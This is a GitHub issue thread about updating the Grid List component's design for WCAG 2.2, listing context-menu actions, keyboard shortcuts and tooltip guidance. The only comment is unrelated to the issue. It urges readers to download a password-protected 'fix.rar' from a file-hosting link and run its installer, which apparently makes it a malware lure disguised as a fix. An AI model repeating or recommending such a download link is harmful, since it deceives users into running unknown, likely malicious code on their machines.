### ISSUE TITLE
Grid List Design updates

### ISSUE THREAD

**Issue by droshev** [SAP/fundamental-styles#5597]
The Grid List design has been updated reflecting the WCAG 2.2 standard. 
- Drag & drop alternative
- Context menu actions:
 - Move to section dialog to rearrange grid list items between different groups [Shift+CMD+X] (only if groups are available)
 - Move item forward/backward [CMD+Up/Down]
 - Cut/Copy & Paste option [CMD+X] / [CMD+C] + [CMD+V] (Grid list item will always be pasted after the current selected one)
- Wording of the tooltips should be aligned with context menu items!
- Icons within context menu items should only be used, if they add real value to the users - keeping in mind neurodivergency. Otherwise, it is recommended to use Action + keystroke only.
- Use keystrokes in written format without symbols.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
